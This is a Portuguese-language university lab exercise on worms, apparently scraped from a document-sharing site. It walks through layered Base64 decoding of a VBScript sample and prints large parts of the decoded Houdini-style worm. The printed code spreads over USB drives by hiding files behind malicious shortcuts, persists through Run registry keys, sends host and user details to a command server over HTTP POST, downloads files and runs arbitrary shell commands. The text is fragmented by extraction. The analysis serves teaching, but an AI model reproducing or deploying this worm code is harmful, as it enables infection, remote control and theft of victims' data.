Академический Документы
Профессиональный Документы
Культура Документы
Segurana da Informao
Prof. Marcelo Ferreira Zochio
Aluno:
Segurana da Informao
RA:
Data:
I. Objetivo
II. Descrio
Um worm (verme) um programa semelhante aos vrus, com a diferena de este ser
auto-replicante, ou seja, ele cria cpias funcionais de si mesmo e infecta outros
computadores. Tal infeco pode ocorrer atravs de conexes de rede locais,
Internet, anexos de emails e mdias USB.
III. Procedimentos
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
Exit Function
End If
nGroup = 64 * nGroup + thisData
Next
nGroup = Hex(nGroup)
nGroup = String(6 - Len(nGroup), "0") & nGroup
49
Next
decodeBase64 = sOut
End Function
50
H maiores detalhes sobre essa codificao, mas ser abordada em outro momento.
Decodificando o texto em Base64 acima, obteve-se na primeira rodada:
JzwgLVNhZmE3XzIyIENyeXB0ZXItID4NClNhZmE3XzIyID0gZGVDcnlwdCgiVTBVNVZsSkZiRTlUVTBFNVNVTkpl
azlZZHpKTlNIZDZUVzUzTUU1WWR6Uk5NM2MxVGpOM2VFMUVTamhQVkdRNFRsUldPRTlVVmpoT1ZFSTRUbFJDT0Ux
NlNqaE9hbVE0VFZSRk1HWkVSWGxOV0hkNFRWUktPRTFVUlRKbVJFVjNUVmgzZUUxVVVqaE9SRlk0VFhwS09FNXFT
amhOVkU0NFRWUkNPRTlFVGpoUFZHUTRUVlJCZVdaRWF6Tm1SRlV4WmtSck1XWkVWWGRtUkZWM1prUk5lV1pFV1ho
bVJFMTVaa1JGZDAxSWQzaE5SRVk0VG1wa09FMVVSVEJtUkVWNVRWaDNlRTFVU2poTlZFVXlaa1JSZDJaRVRUQm1S
R2Q2WmtSRmVFMUlkM2hOVkVvNFRsUktPRTlFYkRoTlZFRXpaa1JGZDA5SWR6Tk5NM2MwVFROM2VFMUViRGhOVkVs
M1prUnJkMlpFWXpObVJFVjNUbTUzZUUxRWFEaE5WRVV3WmtSbk0yWkVSWGRQU0hkNFRVUlNPRTU2VWpoUFZFSTRU
a1JvT0U1VVpEaE5WRVY1WmtSbmVHWkVSWGRQV0hjeFRqTjNlRTFFVmpoT2VtUTRUa1JzT0U5VVFqaE5WRVV3WmtS
bk5XWkVaekptUkdzMVprUlJOV1pFYXpWbVJGazFaa1JGZDA5SWR6SlBTSGMxVGpOM00wMVlkM2hOVkVvNFRucGFP
RTlFVmpoT1JHZzRUbnBTT0U1VVVqaFBSR3c0VDBSU09FNTZhRGhOVkVVeFprUkZkMDFJZHpCUFdIZDRUVlJLT0U5
RVVqaFBSRVk0VDBSU09FOVVRamhPZWxJNFQwUktPRTVVUWpoTlZFRXdaa1JWZDJaRWEzZG1SR04zWmtSRmQwMUlk
elJOTTNjMVQxaDNNMDFZZHpOT1NIZDRUVlJhT0U5VVpEaE9WRVk0VDBSS09FOVVaRGhQVkdnNFRWUkJOV1pFUlhk
TlNIZDRUVlJDT0U5RVpEaE9la0k0VDBSR09FNUVhRGhQUkZJNFRWUkJNMlpFWXpSbVJFVjRUVWgzTTA0emR6SlBX
SGQ0VFZSYU9FNTZWamhOVkVGNFprUkZkMDV1ZHpKT2JuY3dUMGgzTkU1WWR6Tk5TSGN6VGpOM2VFMVViRGhPZW13
NFQwUldPRTFVU1hkbVJHY3haa1JqTTJaRVkzbG1SR2Q1WmtSbmVHWkVaekZtUkZFMFprUmpNR1pFUlhoTk0zYzBU
MWgzZUUxRVdqaE9lazQ0VGtSc09FOVVhRGhQUkdRNFRucENPRTlFYURoUFJHdzRUbFJDT0UxVVFYZG1SR2Q0WmtS
bk1XWkVSWGxOYm5jeVRsaDNNVTB6ZHpST1NIY3pUVWgzTkUxWWQzaE5WR3c0VFZSQmQyWkVZM2RtUkZreVprUm5N
R1pFWXpObVJGazBaa1JGZDA5SWR6Tk9NM2MwVG01M01rOUlkekpPYm5jd1QwaDNORTVZZHpOTlNIY3pUak4zZUUx
VWJEaE9lbXc0VDBSV09FMVVTWGRtUkdjeFprUmpNMlpFWTNsbVJHZDVaa1JuZUdaRVp6Rm1SRVY1VFc1M01rNVlk
ekZOTTNjMFRraDNNMDFJZHpSTldIZDRUVlJzT0UxVVFYZG1SR04zWmtSWk1tWkVaekJtUkdNelprUlpOR1pFUlhk
UFNIY3pUak4zTkU1dWR6SlBTSGN5VG01M00wOVlkelJOV0hjeFRVaDNOVTlZZDNoTlZHdzRUMFJPT0U1VVFqaE9l
a0k0VG5wS09FNTZiRGhQUkdnNFRWUkZlV1pFUlhkT00zYzBUVmgzTUU5SWR6SlBXSGN4VFROM05FMHpkelJPV0hj
elQwaDNNMDVZZHpWT00zY3hUVWgzTTA5SWQzaE5WRm80VDBSS09FMVVRVEptUkZreVprUnJNMlpFWnpKbVJGVjRa
a1JuZVdaRVJYaE9XSGMxVFVoM01rOVlkek5PTTNjd1QxaDNNMDlJZDNoTlJHZzRUVlJCTkdaRVp6Vm1SR2Q0WmtS
RmQwNXVkekpPYm5kNFRVUldPRTFVUVhobVJHY3daa1JuTW1aRVZYZG1SR2MxWmtSVmQyWkVVVFZtUkVWM1RtNTNO
VTR6ZHpST1dIYzBUVzUzTkUxdWR6VlBXSGN6VFc1M2VFMUVRamhOVkVFeFprUmpNMlpFVVRSbVJFVjRUVmgzZUUx
VWJEaFBSRTQ0VDBSV09FOUVSamhOVkVVMVprUnJkMlpFVVRSbVJGVXpaa1JaTldaRVozbG1SR2N4WmtSVmVtWkVX
VFJtUkdzMFprUm5NMlpFUlhsTlNIY3dUMWgzTkU5WWQzaE5ha280VG5wb09FOUVUamhQVkdRNFRucEdPRTU2VWpo
T2VrbzRUVlJCZUdaRVkzaG1SRVY0VG01M2VFMUVVamhQUkdRNFRtcHNPRTFVUVRSbVJFVjRUVWgzTkU1WWR6Tk5T
SGN6VDBoM01rNXVkelZPTTNjMFRsaDNlRTFVU2poUFJHdzRUMFJHT0UxVVJYZG1SRVYzVDBoM2VFMUVWamhPZW1R
NFRWUkJOV1pFWjNsbVJGVjZaa1JuTTJaRVp6Sm1SR3MxWmtSRmVVMUlkelZPTTNjd1QxaDNlRTFFYURoUFJHdzRU
MFJXT0UxVVFUVm1SRVYzVGtoM00wNVlkelJPV0hjd1QwaDNlRTFFYURoT2VtdzRUMFJHT0U1VVFqaE9SR3c0VGxS
S09FMVVRWGRtUkdjelprUlpOV1pFUlhsTldIYzBUak4zZUUxVVFqaE9hbG80VFZSQk1XWkVaM2xtUkZFMVprUm5N
bVpFUlhoTlNIYzBUbGgzTTAxSWR6TlBTSGN5VGpOM00wNHpkek5OV0hjelQwaDNlRTFVWkRoUFJGbzRUVlJCTlda
RVJYbE5TSGN5VDFoM05FNVlkelJQU0hjeVRtNTNlRTFxU2poUFJHdzRUVlJCTldaRVVUVm1SRkUwWmtSck5HWkVa
ek5tUkdONlprUkZlVTFZZDNoTlJFWTRUbnBHT0UxVVJUSm1SR3N6WmtSbk0yWkVXVFZtUkVWM1QwaDNlRTFVUWpo
UFJGWTRUbnBDT0U1NmFEaE9hbVE0VG5wa09FNTZSamhPZW1nNFRWUkZNMlpFWnpKbVJFVjNUMWgzZUUxcVFqaE9h
bXc0VDBSV09FOUVaRGhPVkdRNFRucHNPRTlFUmpoT1ZFSTRUVlJCTkdaRVJYZE9ibmN6VDFoM05FNVlkM2hOYWtJ
NFQwUldPRTU2WkRoT2VrbzRUMFJLT0U5RVJqaFBSRlk0VFZSSmVXWkVXVEZtUkZWNlprUm5NR1pFWTNkbVJHZDRa
a1JGZUU5WWR6Vk5TSGN4VFVoM00wOUlkek5OTTNjMFRtNTNlRTFFYkRoTlZFRTBaa1JGZDA1WWR6Uk5ibmN4VFVo
M2VFMXFRamhOVkVWNlprUm5lbVpFWnpGbVJFVjNUa2gzTlU0emR6Vk9NM2N6VFZoM00wOUlkM2hOVkVvNFQwUkdP
RTlFVWpoTlZFRTBaa1JqTTJaRVp6Sm1SRmswWmtSWk1tWkVVVFJtUkdjeFprUmpkMlpFWXpObVJFVjRUMWgzTTA5
WWR6Uk9XSGQ0VFdwQ09FOUVWamhPZW1RNFRucEtPRTlFU2poUFJFWTRUMFJXT0UxVVNYbG1SRmt4WmtSVmVtWkVa
ekJtUkdOM1prUm5lR1pFUlhoUFdIZDRUVVJDT0U1NlFqaE9hbG80VDBSU09FNTZaRGhPYW1nNFRWUkJOR1pFWXpO
bVJHY3laa1JaTkdaRVdUSm1SRkUwWmtSbk1XWkVZM2RtUkdNelprUkZlRTlZZHpOUFdIYzBUbGgzTkUxdWR6Uk5i
bmMxVDBoM01FOUlkekZOTTNjeVQwaDNOVTlJZHpST2JuY3pUa2gzZUUxVWJEaFBSR3c0VFZSQk5HWkVZelJtUkZr
elprUkZkMDFZZDNoTlJHdzRUbnBDT0U1NlNqaFBSRm80VFZSRmQyWkVZelJtUkVWM1RsaDNORTF1ZDNoTmFrbzRU
VlJCTkdaRVJYaE5ibmMwVDFoM05FNHpkM2hOUkdnNFRtcGFPRTlFVWpoTlZFRXpaa1JqTkdaRVJYaE9NM2MwVGto
M2VFMUViRGhOVkVsM1prUkZkMDR6ZHpSTldIY3dUMGgzTTA1SWR6Rk9TSGMwVDFoM05FNVlkM2hOUkVJNFQwUmtP
RTlVYkRoT1ZFSTRUbnBTT0U1NlNqaE9lbXc0VDBSa09FMVVRVFJtUkVWM1RraDNOVTR6ZHpST1dIY3lUMWgzTVUw
emR6Uk5NM2MwVGxoM2VFMUVVamhOVkVFelprUkZkMDFZZDNoTlJHZzRUVlJCTTJaRVJYbE5ibmMwVFROM2VFMVVR
amhPYWxvNFRWUkJNbVpFWjNwbVJHTjNaa1JqZDJaRVVUVm1SR2N6WmtSbk1HWkVZelJtUkdNeFprUnJOR1pFWTNk
bVJFVjNUMGgzTkU5WWR6Uk9XSGQ0VFVSc09FMVVTWGRtUkVWM1RsaDNNMDR6ZDNoTlJHUTRUVlJGZVdaRVJYbE5T
SGMwVGpOM2VFMUVhRGhOVkVGM1prUmpOV1pFWXpObVJGazFaa1JGZUU1dWR6SlBTSGMwVFROM2VFMUVXamhPZW1n
NFRWUkJNbVpFWXpObVJFVjNUak4zTVUwemR6Rk5NM2MwVDFoM05FNXVkM2hOUkZJNFRtcGtPRTU2WkRoT2FtdzRU
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
Next
decodeBase64 = sOut
End Function
Realizando uma terceira rodada para decifrar o novo cdigo em Base64, obteve-se:
SE9VRElOSSA9ICIzOXw2MHwzMnw0NXw4M3w5N3wxMDJ8OTd8NTV8OTV8NTB8NTB8MzJ8Njd8MTE0fDEyMXwxMTJ8
MTE2fDEwMXwxMTR8NDV8MzJ8NjJ8MTN8MTB8ODN8OTd8MTAyfDk3fDU1fDk1fDUwfDUwfDMyfDYxfDMyfDEwMHwx
MDF8Njd8MTE0fDEyMXwxMTJ8MTE2fDQwfDM0fDgzfDExMHwxMTJ8NTJ8ODl8MTA3fDEwOHw3M3w4M3wxMDl8MTIw
fDkwfDc3fDEwNnwxMDh8MTE0fDg3fDEwOHwxMDR8NzR8OTB8NDh8NTd8MTEyfDgxfDEwOXw1N3wxMDV8Nzd8NDl8
OTB8MTE0fDg5fDg2fDk5fDQ5fDk5fDY5fDEwOHw2OHw5N3w3MXwxMTJ8NzZ8ODV8NDh8NzR8NTR8ODl8ODR8Nzh8
MTE1fDEwMHw0OXwxMTJ8ODR8ODF8ODR8OTB8NzR8ODJ8NTB8MTA0fDUwfDkwfDcwfDEwMHw4M3w5OXw3MXw3NHwx
MTZ8OTd8NTF8ODJ8OTd8OTh8MTA5fDEwMHwxMTB8ODd8NzB8ODF8NDh8ODR8MTA3fDc4fDExMHw3N3w2OXwxMTZ8
NzV8MTAxfDEwNnw2Nnw0OHw4NXw3MHw3N3wxMTl8Nzl8ODV8MTIwfDg1fDc3fDcyfDgyfDgxfDg1fDQ4fDc0fDEx
M3w4OXwxMDZ8NzN8NDl8OTh8ODd8NzB8ODh8ODl8NTB8MTAwfDgxfDg1fDEyMnw2NXw1M3w4NHw3MHw4MXwxMTl8
MTAwfDcwfDY2fDg0fDc3fDY4fDEwOHw3N3w4Nnw2OHw2Nnw0OHw4NXw3MHw3N3wxMTl8Nzl8ODV8MTIwfDg1fDc3
fDcyfDgyfDgxfDg1fDEyMnw2NXw1M3w4NHw3MHw4MXwxMTl8MTAwfDcwfDY2fDg0fDc3fDY4fDEwOHw3N3w4Nnw2
OHw2Nnw3OXw4MXw1MHw5OXwxMTl8ODN8NTB8NzB8NzJ8Nzl8ODh8MTEyfDEwN3w4MXw0OHw2OXw1M3w4M3w4NXw3
OHw3NXw5N3w1MHw3OHwxMTZ8ODJ8MTA2fDY2fDk3fDg2fDUxfDgyfDExNXw5MHw2OXw3N3w0OXw3OHwxMDh8MTA4
fDg5fDgxfDEwNnw2NnwxMDV8MTAxfDg0fDg2fDUwfDg5fDUwfDQ5fDEwNnw5N3w4NXw4Mnw4Mnw5OXw3MnwxMDB8
MTA1fDc3fDQ4fDExMXwxMTl8ODN8ODV8ODF8MTE5fDkwfDQ4fDU3fDY5fDgyfDg1fDUzfDY4fDk4fDg3fDEyMHw0
OXw4OXwxMjJ8Nzh8ODN8OTd8NzF8NzR8NzJ8MTAxfDcxfDExNnwxMDR8ODd8Njl8MTA4fDExMHw4NXw3MHw3OHw2
Nnw5N3w4NXwxMTJ8ODl8ODF8MTEwfDEwOHwxMDV8Nzd8MTA5fDgyfDUzfDg3fDg2fDk5fDEyMHw5N3w0OXwxMDh8
ODl8ODV8MTA5fDEwNHw3NXw4NXw0OHwxMDh8Nzl8ODF8NTB8NDl8NTJ8MTAwfDg3fDY5fDEyMXw4N3wxMTB8NjZ8
MTA1fDgyfDQ5fDg2fDExMHw4NXw3MHw3OHw2N3w3N3w3MXw3OHwxMTd8ODZ8MTA5fDEyMHw2OXw4NXw4OHw2Nnwx
MjJ8ODl8MTA5fDQ5fDQ4fDk4fDg3fDczfDEyMXwxMDF8NzF8MTE2fDk3fDg3fDY5fDEwOHwxMTB8ODV8NzB8Nzh8
Njd8Nzd8NzF8Nzh8MTE3fDg2fDEwOXwxMjB8Njl8ODV8ODd8NTd8Nzl8ODF8NTB8MTA4fDEwNnw3OXw4NXwxMjB8
ODV8Nzd8NzJ8ODJ8ODF8ODV8MTIyfDY1fDUzfDg0fDcwfDgxfDExOXw5MHw1MHw3OHw3M3w4NnwxMDl8MTA4fDEw
NXw4Mnw1MHwxMjB8MTEzfDgzfDg1fDEwNHw5N3w5N3w3MXw3OHwxMTJ8ODF8ODR8MTA4fDc3fDg2fDY4fDY2fDQ4
fDg1fDcwfDc3fDExOXw3OXw4NXwxMjB8ODV8Nzd8NzJ8ODJ8ODF8ODV8MTIyfDY1fDUzfDg0fDcwfDgxfDExOXwx
MDB8NzB8NjZ8ODR8Nzd8Njh8MTA4fDc3fDg2fDY4fDY2fDQ4fDg1fDcwfDc3fDExOXw3OXw4NXw4Mnw4Mnw5OHw0
OHw1M3w2OHw5OHw4Nnw3NHwxMTl8ODl8MTA4fDc4fDY3fDEwMXwxMDl8NzB8NzJ8ODZ8MTEwfDc4fDEwNXw4Mnwx
MjJ8MTA4fDExMnw4OXw4N3wxMDh8NjZ8ODR8MTA3fDc4fDExN3w4NHwxMDl8MTIwfDEwN3w4MXw0OHw3NHw1NHw4
OXw4NXwxMDB8ODd8OTl8NTB8NzR8NzJ8Nzl8ODd8MTA4fDEwNHw5N3w4NXw2OXw1M3w4M3w4NXwxMDR8MTA3fDEw
MXwxMDh8MTA3fDEyMnw4M3wxMTB8NjZ8MTA2fDgzfDcwfDcwfDQ5fDg3fDg0fDc4fDc1fDk4fDcwfDEwOHw4OXw4
NXwxMDl8MTIwfDEwNXw3N3wxMDd8MTEyfDEyMHw4N3wxMDh8MTAwfDc5fDc3fDY5fDExNnw2OHw4M3wxMDZ8Nzh8
MTA2fDc3fDEwN3w1M3w1M3w4OXw4NnwxMDR8Njd8Nzd8Njl8MTIwfDExN3w4NHwxMDl8NTd8OTd8ODZ8NTF8MTA0
fDEyMnw4M3w4N3wxMDh8MTE0fDg0fDEwN3w3OHwxMTZ8ODV8MTEwfDY2fDEwNXw4NXw0OHw3NHwxMTZ8ODl8ODZ8
MTAwfDUyfDk4fDcxfDc3fDEyMnw5OHw3MnwxMTJ8MTA3fDgyfDQ5fDkwfDQ4fDg5fDEwNnw3NHw3NXw5OXw4NXw4
Mnw4Mnw5OXw3MnwxMTJ8OTd8ODd8NzB8NzB8MTEwfDg3fDEwOXw0OXwxMTV8OTl8NDl8MTEyfDg5fDg0fDEwNnw4
NnwxMDZ8Nzd8NDl8NzR8MTE1fDg5fDEwOHw5OXw1M3w5N3w4N3w3MHwxMTJ8ODF8ODR8MTA4fDc0fDgyfDQ4fDUz
fDUzfDg3fDEwOHwxMDB8NzF8Nzd8NzB8MTEyfDg4fDc5fDg3fDEwOHwxMDR8OTh8ODZ8OTB8MTEzfDkwfDY5fDc4
fDExMHw5N3w4N3w3N3wxMjF8ODR8MTEwfDEwOHwxMDR8ODd8Njl8NzN8MTE5fDg5fDg2fDk5fDQ5fDk4fDEwN3wx
MjB8MTE2fDg3fDExMHw2NnwxMDV8ODJ8NDl8OTB8NTR8OTB8ODZ8MTA0fDc5fDc3fDcwfDExMnw4OHw3N3w4OHw5
MHw5MHw5OHw4OHw2NnwxMTV8ODd8ODR8Nzh8ODJ8OTd8ODV8MTE2fDgyfDc3fDY5fDExNnw5N3w4Mnw1MHwxMjB8
NDh8ODN8ODV8MTAwfDExMXw3N3w3MXw4Mnw3M3w4MXwxMTB8OTB8OTB8OTh8ODd8NTd8Nzl8ODF8NTB8NTN8Nzl8
OTh8NzF8ODJ8Njh8ODF8MTA5fDU3fDEwN3w4M3w3MHw3NHw1MXw4OXwxMDZ8NzR8NzV8OTl8ODV8MTA4fDY5fDc3
fDcxfDEwMHw5MHw3N3w0OHwxMTJ8MTE1fDg3fDg2fDEwNHw4M3w5OHw3MXw3M3wxMjF8ODN8MTEwfDcwfDk3fDg2
fDQ4fDUyfDExOXw4M3w0OHw3OHw3NXwxMDB8NzF8Nzd8MTIyfDk3fDcyfDgyfDEwNXw4Mnw2OXwxMDh8NDl8OTB8
ODV8OTl8MTIwfDk5fDUwfDcwfDczfDg1fDEwNnw2NnwxMDZ8ODF8NDh8MTA4fDExOXw4Mnw3MHw3MHwxMTh8ODR8
MTA3fDc4fDExMHw3N3w2OXwxMTZ8NzV8MTAxfDEwNnw2Nnw0OHw4NXw3MHw3N3wxMTl8Nzl8ODV8MTIwfDg1fDc3
fDcyfDgyfDgxfDg1fDQ4fDc0fDUxfDg5fDUwfDQ5fDExNXw3N3wxMDh8MTA4fDg5fDg1fDg3fDEwMHwxMDd8OTh8
ODV8OTB8NTN8ODN8ODV8ODF8MTE5fDEwMHw3MHw2Nnw4NHw3N3w2OHwxMDh8Nzd8ODZ8Njh8NjZ8NDh8ODV8NzB8
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
Na quarta rodada:
HOUDINI =
"39|60|32|45|83|97|102|97|55|95|50|50|32|67|114|121|112|116|101|114|45|32|62|13|10|83|97
|102|97|55|95|50|50|32|61|32|100|101|67|114|121|112|116|40|34|83|110|112|52|89|107|108|7
3|83|109|120|90|77|106|108|114|87|108|104|74|90|48|57|112|81|109|57|105|77|49|90|114|89|
86|99|49|99|69|108|68|97|71|112|76|85|48|74|54|89|84|78|115|100|49|112|84|81|84|90|74|82
|50|104|50|90|70|100|83|99|71|74|116|97|51|82|97|98|109|100|110|87|70|81|48|84|107|78|11
0|77|69|116|75|101|106|66|48|85|70|77|119|79|85|120|85|77|72|82|81|85|48|74|113|89|106|7
3|49|98|87|70|88|89|50|100|81|85|122|65|53|84|70|81|119|100|70|66|84|77|68|108|77|86|68|
66|48|85|70|77|119|79|85|120|85|77|72|82|81|85|122|65|53|84|70|81|119|100|70|66|84|77|68
|108|77|86|68|66|79|81|50|99|119|83|50|70|72|79|88|112|107|81|48|69|53|83|85|78|75|97|50
|78|116|82|106|66|97|86|51|82|115|90|69|77|49|78|108|108|89|81|106|66|105|101|84|86|50|8
9|50|49|106|97|85|82|82|99|72|100|105|77|48|111|119|83|85|81|119|90|48|57|69|82|85|53|68
|98|87|120|49|89|122|78|83|97|71|74|72|101|71|116|104|87|69|108|110|85|70|78|66|97|85|11
2|89|81|110|108|105|77|109|82|53|87|86|99|120|97|49|108|89|85|109|104|75|85|48|108|79|81
|50|49|52|100|87|69|121|87|110|66|105|82|49|86|110|85|70|78|67|77|71|78|117|86|109|120|6
9|85|88|66|122|89|109|49|48|98|87|73|121|101|71|116|97|87|69|108|110|85|70|78|67|77|71|7
8|117|86|109|120|69|85|87|57|79|81|50|108|106|79|85|120|85|77|72|82|81|85|122|65|53|84|7
0|81|119|90|50|78|73|86|109|108|105|82|50|120|113|83|85|104|97|97|71|78|112|81|84|108|77
|86|68|66|48|85|70|77|119|79|85|120|85|77|72|82|81|85|122|65|53|84|70|81|119|100|70|66|8
4|77|68|108|77|86|68|66|48|85|70|77|119|79|85|82|82|98|48|53|68|98|86|74|119|89|108|78|6
7|101|109|70|72|86|110|78|105|82|122|108|112|89|87|108|66|84|107|78|117|84|109|120|107|8
1|48|74|54|89|85|100|87|99|50|74|72|79|87|108|104|97|85|69|53|83|85|104|107|101|108|107|
122|83|110|66|106|83|70|70|49|87|84|78|75|98|70|108|89|85|109|120|105|77|107|112|120|87|
108|100|79|77|69|116|68|83|106|78|106|77|107|53|53|89|86|104|67|77|69|120|117|84|109|57|
97|86|51|104|122|83|87|108|114|84|107|78|116|85|110|66|105|85|48|74|116|89|86|100|52|98|
71|77|122|98|72|112|107|82|49|90|48|89|106|74|75|99|85|82|82|99|72|112|97|87|70|70|110|8
7|109|49|115|99|49|112|89|84|106|86|106|77|49|74|115|89|108|99|53|97|87|70|112|81|84|108
|74|82|48|53|53|87|108|100|71|77|70|112|88|79|87|108|104|98|86|90|113|90|69|78|110|97|87
|77|121|84|110|108|104|87|69|73|119|89|86|99|49|98|107|120|116|87|110|66|105|82|49|90|54
|90|86|104|79|77|70|112|88|77|88|90|90|98|88|66|115|87|84|78|82|97|85|116|82|77|69|116|9
7|82|50|120|48|83|85|100|111|77|71|82|73|81|110|90|90|98|87|57|79|81|50|53|79|98|71|82|6
8|81|109|57|107|83|70|74|51|89|106|74|75|99|85|108|69|77|71|100|90|77|48|112|115|87|86|1
04|83|98|71|73|121|83|110|70|97|86|48|52|119|83|48|78|75|100|71|77|122|97|72|82|105|82|6
9|108|49|90|85|99|120|99|50|70|73|85|106|66|106|81|48|108|119|82|70|70|118|84|107|78|110
|77|69|116|75|101|106|66|48|85|70|77|119|79|85|120|85|77|72|82|81|85|48|74|51|89|50|49|1
15|77|108|108|89|85|87|100|107|98|85|90|53|83|85|81|119|100|70|66|84|77|68|108|77|86|68|
66|48|85|70|77|119|79|85|120|85|77|72|82|81|85|122|65|53|84|70|81|119|100|70|66|84|77|68
|108|69|85|87|57|79|81|50|49|115|100|87|77|122|85|109|104|105|82|51|104|49|87|86|99|120|
98|69|108|69|77|71|100|107|77|48|53|113|89|50|49|115|100|50|82|68|78|88|112|90|77|48|112
|119|89|48|104|83|100|86|108|88|77|87|120|69|85|88|66|54|90|69|100|71|101|87|82|73|86|11
0|100|74|82|68|66|110|89|122|74|111|98|71|74|72|101|72|90|90|98|87|57|49|89|122|78|67|98
|70|107|121|98|71|104|105|82|49|112|50|89|107|100|83|98|71|78|117|84|87|100|76|81|48|112
|54|90|69|100|71|101|87|82|73|86|110|100|74|97|87|116|110|83|109|108|66|97|86|104|68|83|
85|53|68|98|87|120|49|89|122|78|83|97|71|74|72|101|71|116|104|87|69|108|110|85|70|78|67|
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
shellobj
shellobj = wscript.createobject("wscript.shell")
filesystemobj
filesystemobj = createobject("scripting.filesystemobject")
httpobj
httpobj = createobject("msxml2.xmlhttp")
installdir
147
148
file.attributes = 2+4
if ucase (file.name) <> ucase (installname) then
filename = split(file.name,".")
set lnkobj = shellobj.createshortcut (drive.path & "\"
& filename
lnkobj.windowstyle = 7
lnkobj.targetpath = "cmd.exe"
lnkobj.workingdirectory = ""
lnkobj.arguments = "/c start " & replace(installname," ", chrw(34) &
" " & chrw(34)) & "&start " & replace(file.name," ", chrw(34) & " " & chrw(34)) &"&exit"
fileicon = shellobj.regread ("HKEY_LOCAL_MACHINE\software\classes\"
&
shellobj.regread
("HKEY_LOCAL_MACHINE\software\classes\."
&
split(file.name,
".")(ubound(split(file.name, ".")))& "\") & "\defaulticon\")
if instr (fileicon,",") = 0 then
lnkobj.iconlocation = file.path
else
lnkobj.iconlocation = fileicon
end if
lnkobj.save()
end if
end if
end if
next
for each folder in filesystemobj.getfolder( drive.path & "\" ).subfolders
if not lnkfolder then exit for
folder.attributes = 2+4
foldername = folder.name
set lnkobj = shellobj.createshortcut (drive.path & "\" & foldername & ".lnk")
lnkobj.windowstyle = 7
lnkobj.targetpath = "cmd.exe"
lnkobj.workingdirectory = ""
lnkobj.arguments = "/c start " & replace(installname," ", chrw(34) & " " &
chrw(34)) & "&start explorer " & replace(folder.name," ", chrw(34) & " " & chrw(34))
&"&exit"
foldericon
=
shellobj.regread
("HKEY_LOCAL_MACHINE\software\classes\folder\defaulticon\")
if instr (foldericon,",") = 0 then
lnkobj.iconlocation = folder.path
else
lnkobj.iconlocation = foldericon
end if
lnkobj.save()
next
end If
end If
end if
next
err.clear
end sub
sub uninstall
on error resume next
dim filename
dim foldername
shellobj.regdelete "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run\" &
split (installname,".")(0)
shellobj.regdelete "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run\" &
split (installname,".")(0)
filesystemobj.deletefile startup & installname ,true
filesystemobj.deletefile wscript.scriptfullname ,true
for each drive in filesystemobj.drives
if drive.isready = true then
if drive.freespace > 0 then
if drive.drivetype = 1 then
for each file in filesystemobj.getfolder ( drive.path & "\").files
on error resume next
if instr (file.name,".") then
149
then
file.attributes = 0
if ucase (file.name) <> ucase (installname) then
filename = split(file.name,".")
filesystemobj.deletefile (drive.path & "\" & filename(0) & ".lnk" )
else
filesystemobj.deletefile (drive.path & "\" & file.name)
end If
else
filesystemobj.deletefile (file.path)
end if
end if
next
for each folder in filesystemobj.getfolder( drive.path & "\" ).subfolders
folder.attributes = 0
next
end if
end if
end if
next
wscript.quit
end sub
function post (cmd ,param)
post = param
httpobj.open "post","http://" & host & ":" & port &"/" & cmd, false
httpobj.setrequestheader "user-agent:",information
httpobj.send param
post = httpobj.responsetext
end function
function information
on error resume next
if inf = "" then
inf = hwid & spliter
inf = inf & shellobj.expandenvironmentstrings("%computername%") & spliter
inf = inf & shellobj.expandenvironmentstrings("%username%") & spliter
set root = getobject("winmgmts:{impersonationlevel=impersonate}!\\.\root\cimv2")
set os = root.execquery ("select * from win32_operatingsystem")
for each osinfo in os
inf = inf & osinfo.caption & spliter
exit for
next
inf = inf & "plus" & spliter
inf = inf & security & spliter
inf = inf & usbspreading
information = inf
else
information = inf
end if
end function
sub upstart ()
on error resume Next
shellobj.regwrite "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run\"
split (installname,".")(0), "wscript.exe //B " & chrw(34) & installdir & installname
chrw(34) , "REG_SZ"
shellobj.regwrite "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run\"
split (installname,".")(0), "wscript.exe //B " & chrw(34) & installdir & installname
chrw(34) , "REG_SZ"
filesystemobj.copyfile wscript.scriptfullname,installdir & installname,true
filesystemobj.copyfile wscript.scriptfullname,startup & installname ,true
&
&
&
&
end sub
function hwid
on error resume next
set root = getobject("winmgmts:{impersonationlevel=impersonate}!\\.\root\cimv2")
set disks = root.execquery ("select * from win32_logicaldisk")
150
upstart
set scriptfullnameshort = filesystemobj.getfile (wscript.scriptfullname)
set installfullnameshort = filesystemobj.getfile (installdir & installname)
if lcase (scriptfullnameshort.shortpath) <> lcase (installfullnameshort.shortpath) then
shellobj.run "wscript.exe //B " & chr(34) & installdir & installname & Chr(34)
wscript.quit
end If
err.clear
set oneonce = filesystemobj.opentextfile (installdir & installname ,8, false)
if err.number > 0 then wscript.quit
end function
sub sitedownloader (fileurl,filename)
strlink = fileurl
strsaveto = installdir & filename
set objhttpdownload = createobject("msxml2.xmlhttp" )
151
152
function enumdriver ()
for
if
&
"|"
&
"f"
&
"|"
&
next
end function
function enumprocess ()
on error resume next
set objwmiservice = getobject("winmgmts:\\.\root\cimv2")
set colitems = objwmiservice.execquery("select * from win32_process",,48)
dim objitem
for each objitem in colitems
enumprocess = enumprocess & objitem.name & "|"
enumprocess = enumprocess & objitem.processid & "|"
enumprocess = enumprocess & objitem.executablepath & spliter
next
end function
sub exitprocess (pid)
on error resume next
shellobj.run "taskkill /F /T /PID " & pid,7,true
end sub
sub deletefaf (url)
on error resume next
filesystemobj.deletefile url
filesystemobj.deletefolder url
end sub
function cmdshell (cmd)
dim httpobj,oexec,readallfromany
set oexec = shellobj.exec ("%comspec% /c " & cmd)
if not oexec.stdout.atendofstream then
readallfromany = oexec.stdout.readall
elseif not oexec.stderr.atendofstream then
readallfromany = oexec.stderr.readall
else
readallfromany = ""
end if
cmdshell = readallfromany
end function
154
155
156
lcase(fn) then
Err.Clear
fs.CopyFile wscript.scriptfullname,dr & fn ,true
set fh = fs.OpenTextFile( dr & fn, 8, false)
if Err.Number>0 then
wscript.quit
end if
xins
end function
sub xins
on error resume next
